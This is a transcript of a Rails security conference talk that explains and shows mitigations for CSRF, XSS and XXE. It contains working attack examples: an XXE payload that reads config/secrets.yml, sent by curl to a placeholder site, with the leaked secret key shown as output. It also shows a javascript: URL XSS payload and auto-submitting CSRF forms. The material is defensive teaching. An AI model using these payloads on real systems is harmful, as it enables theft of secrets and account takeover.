$30 off During Our Annual Pro Sale. View Details »

Security is Broken: Understanding Common Vulnerabilities

Security is Broken: Understanding Common Vulnerabilities

The Internet is built on technology that was never meant to work together. Basic features in seemingly simple and innocuous technologies, such as XML, resulted in these technologies being insecure. In this session we'll talk about how attackers exploit well known vulnerabilities like XSS, XXE, and CSRF and how to make more secure software by avoiding similar decisions that resulted in these exploits.

Eileen M. Uchitelle

May 24, 2016
Tweet

More Decks by Eileen M. Uchitelle

Other Decks in Technology

Transcript

  1. SECURITY IS BROKEN
    Understanding Common Vulnerabilities

    View Slide

  2. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance
    Team at Basecamp
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide

  3. OPEN SOURCE
    Rails Committers
    Rails Security

    View Slide

  4. View Slide

  5. View Slide

  6. How is security
    broken?

    View Slide

  7. • Impossible to test for all possible
    vulnerabilities
    How is security broken?

    View Slide

  8. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    How is security broken?

    View Slide

  9. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to
    exposing new ones
    How is security broken?

    View Slide

  10. How did we get
    here?

    View Slide

  11. • Failed to enforce web standards
    How did we get here?

    View Slide

  12. vs.

    View Slide

  13. View Slide

  14. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    How did we get here?

    View Slide

  15. “...completely failed to come up with
    even the most rudimentary usable
    frameworks for understanding the
    security of modern software.”
    – Michal Zalewski, The Tangled Web

    View Slide

  16. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    • Too few people understand the
    vulnerabilities
    How did we get here?

    View Slide

  17. View Slide

  18. CSRF

    View Slide

  19. CSRF
    Cross-Site Request Forgery

    View Slide

  20. EXPLOITING CSRF

    View Slide

  21. View Slide


  22. Name

    Email

    Website



    View Slide

  23. View Slide

  24. Looks the same, different URL

    View Slide



  25. Name

    Email

    Website




    View Slide


  26. Name

    Email

    Website



    Attackers email

    View Slide



  27. Name

    Email

    Website




    Auto-submit form

    View Slide



  28. Name

    Email

    Website




    Auto-submit form
    to victim site

    View Slide

  29. Attacker’s email

    View Slide

  30. How dangerous are
    CSRF attacks?

    View Slide

  31. How to mitigate
    CSRF?

    View Slide

  32. • Use built-in framework CSRF protection
    How to mitigate CSRF?

    View Slide

  33. View Slide

  34. class ApplicationController < ActionController::Base
    protect_from_forgery with: :exception
    end

    View Slide


  35. name=authenticity_token" />
    Name

    Email

    Website



    CSRF protection

    View Slide

  36. Caveat:
    CSRF protection in Rails is
    order-dependent

    View Slide

  37. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  38. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    Conditional
    authentication

    View Slide

  39. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class OtherController < ApplicationController
    skip_before_action :authenticate
    before_action :authenticate_method, only: :create
    end

    View Slide

  40. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class OtherController < ApplicationController
    skip_before_action :authenticate
    before_action :authenticate_method, only: :create
    end
    Skip auth callback

    View Slide

  41. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class OtherController < ActionController::Base
    skip_before_action :authenticate
    before_action :authenticate_method, only: :create
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  42. View Slide

  43. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    How to mitigate CSRF?

    View Slide

  44. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    How to mitigate CSRF?

    View Slide

  45. class SessionsController < ApplicationController
    def destroy
    sign_out
    reset_session
    redirect_to sign_in_url
    end
    end
    Refreshes
    Authenticity Token

    View Slide

  46. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    • Mitigate XSS attacks
    How to mitigate CSRF?

    View Slide

  47. XSS

    View Slide

  48. XSS
    Cross-Site Scripting

    View Slide

  49. EXPLOITING STORED
    XSS

    View Slide

  50. View Slide

  51. View Slide

  52. Escaped HTML

    View Slide

  53. Profile
    <%= notice %>

    Name:
    <%= @user.name %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

    View Slide

  54. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

    View Slide

  55. Unescaped HTML

    View Slide

  56. JavaScript Scheme

    View Slide

  57. View Slide

  58. javascript://example.com/%0Aalert(1)

    View Slide

  59. example.com/%0Aalert(1)
    JavaScript Scheme
    javascript://

    View Slide

  60. javascript://example.com/%0Aalert(1)
    URL
    example.com

    View Slide

  61. Percent encoded “line feed”
    javascript://example.com/%0Aalert(1)
    %0A

    View Slide

  62. JavaScript Alert
    javascript://example.com/%0Aalert(1)
    alert(1)

    View Slide

  63. How dangerous are
    XSS attacks?

    View Slide

  64. How to mitigate
    XSS?

    View Slide

  65. • Always escape user-provided data
    How to mitigate XSS?

    View Slide

  66. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Don’t do this

    View Slide

  67. View Slide

  68. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    How to mitigate XSS?

    View Slide

  69. Profile
    <%= notice %>

    Name:
    <%= sanitize(@user.name) %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Will strip out unwanted
    tags and attributes

    View Slide

  70. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    • Validate user-provided data
    How to mitigate XSS?

    View Slide

  71. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  72. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  73. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  74. XXE

    View Slide

  75. XXE
    XML eXternal Entity Attack

    View Slide



  76. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Do laundry
    Get car oil changed

    View Slide



  77. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Do laundry
    Get car oil changed

    Entity reference

    View Slide


  78. Book flight to San Francisco
    Finish Security Talk

    View Slide



  79. Groceries
    Take Arya to the vet
    Book flight to San Francisco
    Finish Security Talk
    Pick up beer
    Do laundry

    View Slide

  80. EXPLOITING XXE

    View Slide

  81. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end

    View Slide

  82. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end
    XML

    View Slide

  83. config/secrets.yml">
    ]>

    &name;

    View Slide

  84. config/secrets.yml">
    ]>

    &name;

    Requested file

    View Slide

  85. config/secrets.yml">
    ]>

    &name;

    Entity reference

    View Slide

  86. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml
    POST request to
    users create

    View Slide

  87. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml
    Payload

    View Slide

  88. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml


    ...
    production:
    secret_key_base:
    271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5
    f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40
    00e166a9a5
    ...


    User’s Name

    View Slide

  89. View Slide

  90. How dangerous are
    XXE attacks?

    View Slide

  91. View Slide

  92. How to mitigate
    XXE?

    View Slide

  93. • Don’t parse XML
    How to mitigate XXE?

    View Slide

  94. Don’t parse XML

    View Slide

  95. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    How to mitigate XXE?

    View Slide

  96. >> LibXML::XML.default_substitute_entities
    >> true

    View Slide

  97. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    • Whitelist known entities
    How to mitigate XXE?

    View Slide

  98. Investigate vulnerabilities & patches
    SECURITY

    View Slide

  99. GitHub

    eileencodes/security_examples

    View Slide

  100. owasp.org

    View Slide

  101. View Slide

  102. Brakeman

    View Slide

  103. Resilience & empowerment
    SECURITY

    View Slide

  104. View Slide

  105. Awareness of vulnerabilities
    SECURITY

    View Slide

  106. View Slide

  107. To the future

    View Slide

  108. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance
    Team at Basecamp
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide